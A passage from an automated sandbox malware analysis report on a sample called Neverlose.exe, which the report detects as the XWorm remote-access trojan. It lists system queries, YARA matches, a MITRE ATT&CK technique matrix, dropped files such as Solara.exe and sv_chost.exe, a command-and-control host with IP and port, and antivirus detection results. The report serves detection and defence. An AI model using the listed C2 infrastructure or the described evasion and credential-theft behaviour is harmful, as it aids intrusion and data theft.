                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Solara.exe VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Solara.exe VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeQueries volume information: C:\Users\user\AppData\Roaming\sv_chost.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeQueries volume information: C:\Users\user\AppData\Roaming\sv_chost.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exeQueries volume information: C:\Users\user\AppData\Roaming\sv_chost.exe VolumeInformation
                  Source: C:\Users\user\Desktop\Neverlose.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Solara.exe, 00000004.00000002.2921766888.000000001C174000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000004.00000002.2921766888.000000001C0C0000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000004.00000002.2921766888.000000001C143000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: Solara.exe, 00000004.00000002.2921766888.000000001C143000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Defender\MsMpeng.exe
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected XWorm
                  Source: Yara matchFile source: 4.0.Solara.exe.da0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Neverlose.exe.3942eb0.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Neverlose.exe.3939200.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000000.1722027125.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Neverlose.exe PID: 5888, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Solara.exe PID: 7184, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Solara.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\sv_chost.exe, type: DROPPED

                  Remote Access Functionality

                  barindex
                  Yara detected XWorm
                  Source: Yara matchFile source: 4.0.Solara.exe.da0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Neverlose.exe.3942eb0.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Neverlose.exe.3939200.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000000.1722027125.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Neverlose.exe PID: 5888, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Solara.exe PID: 7184, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Solara.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\sv_chost.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Windows Management Instrumentation                  		1
                  Scheduled Task/Job                  		11
                  Process Injection                  		1
                  Masquerading                  		OS Credential Dumping321
                  Security Software Discovery                  		Remote Services11
                  Archive Collected Data                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job                  		121
                  Registry Run Keys / Startup Folder                  		1
                  Scheduled Task/Job                  		11
                  Disable or Modify Tools                  		LSASS Memory1
                  Process Discovery                  		Remote Desktop ProtocolData from Removable Media1
                  Non-Standard Port                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  PowerShell                  		1
                  DLL Side-Loading                  		121
                  Registry Run Keys / Startup Folder                  		231
                  Virtualization/Sandbox Evasion                  		Security Account Manager231
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive3
                  Ingress Tool Transfer                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                  DLL Side-Loading                  		11
                  Process Injection                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                  Deobfuscate/Decode Files or Information                  		LSA Secrets1
                  File and Directory Discovery                  		SSHKeylogging14
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                  Obfuscated Files or Information                  		Cached Domain Credentials13
                  System Information Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items42
                  Software Packing                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Timestomp                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  DLL Side-Loading                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1498483 Sample: Neverlose.exe Startdate: 24/08/2024 Architecture: WINDOWS Score: 100 59 22.ip.gl.ply.gg 2->59 61 raw.githubusercontent.com 2->61 63 github.com 2->63 71 Suricata IDS alerts for network traffic 2->71 73 Found malware configuration 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 17 other signatures 2->77 9 Neverlose.exe 1 4 2->9         started        13 sv_chost.exe 2->13         started        15 Solara.exe 2->15         started        17 3 other processes 2->17 signatures3 process4 file5 53 C:\Users\user\...\SolaraBootstrapper.exe, PE32 9->53 dropped 55 C:\Users\user\AppData\Local\Temp\Solara.exe, PE32 9->55 dropped 57 C:\Users\user\AppData\...57everlose.exe.log, ASCII 9->57 dropped 89 Detected unpacking (changes PE section rights) 9->89 91 Detected unpacking (overwrites its own PE header) 9->91 93 Creates multiple autostart registry keys 9->93 101 3 other signatures 9->101 19 Solara.exe 1 6 9->19         started        24 SolaraBootstrapper.exe 15 9 9->24         started        26 powershell.exe 23 9->26         started        95 Antivirus detection for dropped file 13->95 97 Multi AV Scanner detection for dropped file 13->97 99 Machine Learning detection for dropped file 13->99 signatures6 process7 dnsIp8 65 22.ip.gl.ply.gg 147.185.221.22, 14520, 49740, 49741 SALSGIVERUS United States 19->65 51 C:\Users\user\AppData\Roaming\sv_chost.exe, PE32 19->51 dropped 79 Antivirus detection for dropped file 19->79 81 Multi AV Scanner detection for dropped file 19->81 83 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 19->83 87 5 other signatures 19->87 28 powershell.exe 22 19->28         started        31 powershell.exe 19->31         started        33 powershell.exe 19->33         started        39 2 other processes 19->39 67 github.com 140.82.121.4, 443, 49730, 49732 GITHUBUS United States 24->67 69 raw.githubusercontent.com 185.199.109.133, 443, 49731 FASTLYUS Netherlands 24->69 35 conhost.exe 24->35         started        85 Loading BitLocker PowerShell Module 26->85 37 conhost.exe 26->37         started        file9 signatures10 process11 signatures12 103 Loading BitLocker PowerShell Module 28->103 41 conhost.exe 28->41         started        43 conhost.exe 31->43         started        45 conhost.exe 33->45         started        47 conhost.exe 39->47         started        49 conhost.exe 39->49         started        process13

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Neverlose.exe41%VirustotalBrowse
                  Neverlose.exe74%ReversingLabsWin32.Backdoor.Xworm
                  Neverlose.exe100%AviraHEUR/AGEN.1308820
                  Neverlose.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\Solara.exe100%AviraTR/Spy.Gen
                  C:\Users\user\AppData\Roaming\sv_chost.exe100%AviraTR/Spy.Gen
                  C:\Users\user\AppData\Local\Temp\Solara.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\sv_chost.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\Solara.exe76%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
                  C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe33%ReversingLabsWin32.PUA.Packunwan
                  C:\Users\user\AppData\Roaming\sv_chost.exe76%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  22.ip.gl.ply.gg4%VirustotalBrowse
                  github.com0%VirustotalBrowse
                  raw.githubusercontent.com0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  https://aka.ms/pscore6lB0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                  https://go.micro0%URL Reputationsafe
                  http://crl.mic0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://github.com/solutions/industries/financial-services0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_j0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-55a9038b0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/github-mark-57519b92ca4e.png0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_clsx_dist_clsx_m_js-node_modules_primer_0%Avira URL Cloudsafe
                  https://github.com/solutions/industries/financial-services1%VirustotalBrowse
                  https://github.githubassets.com/assets/github-mark-57519b92ca4e.png0%VirustotalBrowse
                  https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TooltipV2_Tooltip_j0%VirustotalBrowse
                  https://github.com/solutions/devsecops0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo1%VirustotalBrowse
                  https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-850%Avira URL Cloudsafe
                  https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txt0%Avira URL Cloudsafe
                  https://github.com/readme0%Avira URL Cloudsafe
                  https://github.com/customer-stories0%Avira URL Cloudsafe
                  https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser0%VirustotalBrowse
                  https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-850%VirustotalBrowse
                  https://github.githubassets.com/assets/element-registry-ee3b4c180fee.js0%Avira URL Cloudsafe
                  https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txt1%VirustotalBrowse
                  https://github.com/features0%Avira URL Cloudsafe
                  https://github.com/features/code-review0%Avira URL Cloudsafe
                  https://github.com/customer-stories1%VirustotalBrowse
                  https://github.com/readme1%VirustotalBrowse
                  https://github.com/features/issues0%Avira URL Cloudsafe
